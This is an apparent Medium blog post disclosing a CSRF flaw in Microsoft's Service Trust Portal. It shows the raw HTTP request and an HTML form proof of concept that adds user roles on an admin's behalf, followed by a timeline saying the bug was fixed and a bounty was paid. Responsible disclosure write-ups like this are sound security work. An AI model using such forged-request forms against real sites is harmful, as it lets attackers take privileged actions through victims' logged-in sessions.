Open in app

Sign in

Write

Sign in

Microsoft CSRF Vulnerability

Adesh Kolte
2 min readOct 12, 2018

I am Adesh Nandkishor Kolte an Independent Security Resercher From India

and also working with SecureLayer7 as a Security Consultant

Talking about Microsoft bug bounty first point they only accept submission which is high impact. Big `NO` to low hanging fruits and big `NO` if you can not exploit the bug. I was testing one of Microsoft domain — Service Trust Portal (STP).
During the testing, I came across below feature in their portal where you can add Portal users and Portal admin. The Add User feature caught my attention, generally speaking while checking out the application I always try to correlate application work flow with respect to different attack vector which I can execute , so that time straight away I though about CSRF.

Vulnerable URL:

https://trustportal.office.com/onboarding/AddUserRole

POC:-

HTTP Request:-

GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Cookie: [Some_value]
Connection: keep-alive

From above HTTP Request we conclude that there is no CSRF token present.
This way by using this loophole I was able to Add User roles on behalf of admin user.

Exploitation:-

<html>
<body>
<form action=”https://trustportal.office.com/onboarding/AddUserRole/1110">
<input type=”hidden” name=”role” value=”User” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

So I was able to add any user in their Cloud Service Trust Portal by using CSRF Attack.

They listed me in their Hall Of Fame and Rewarded me with the bounty.

Aug 14, 2017 : Reported to Microsoft Security Response Center.
Aug 20, 2017 : Received initial reply from Microsoft Team. Report Triaged
Aug 25, 2017 : Microsoft Security Team successfully reproduced the bug.
Sep 16, 2017 : Microsoft Security Team Fixed the reported bug.
Oct 01, 2017 : Bounty Awarded of $500 by Microsoft
Disclosed……

Security

--

--

Adesh Kolte

Written by Adesh Kolte

604 Followers

Listed in Top 100 most respected hackers in the world by Microsoft at the BlackHat conference in America 2018

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams